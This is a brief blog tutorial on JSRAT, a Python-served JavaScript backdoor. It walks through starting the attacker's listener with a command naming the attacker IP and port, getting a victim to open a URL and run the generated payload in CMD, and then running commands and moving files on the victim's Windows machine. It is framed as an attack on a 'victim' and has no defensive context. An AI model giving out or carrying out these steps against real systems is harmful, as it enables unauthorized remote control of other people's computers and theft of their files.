Advertisements

JSRAT – Javascript Backdoor to Control Victim Machine

JSRAT is a python Script that can be used to get a remote shell of victim pc.

Installation & Setup :-

  • Download the JSRAT tool Here

  • Download and give appropriate permission to execute the script.Above figure shows the complete installation

Starting the web server:

  • Run and execute the command: python JSRAT.py -i <kali Linux or Attacker Ip> -p 8080

 

VICTIM MACHINE:-

  • Open this Client command URL with Victim browser

  • To gain the shell payload generated by URL should be opened with CMD.

  • Once the command is executed a shell will be obtained.

BACK TO ATTACKERS MACHINE:-

  • Here we go !!! We have connected to Victim machine

  • Let us try some windows command: Ipconfig

  • Above Figure shows executing the command calc opens up the windows calculator.JSRat can also provide upload, Read and Download files.
Advertisements

Leave a Reply

Your email address will not be published. Required fields are marked *

Advertisements
Advertisements
Advertisements
Advertisements
%d bloggers like this: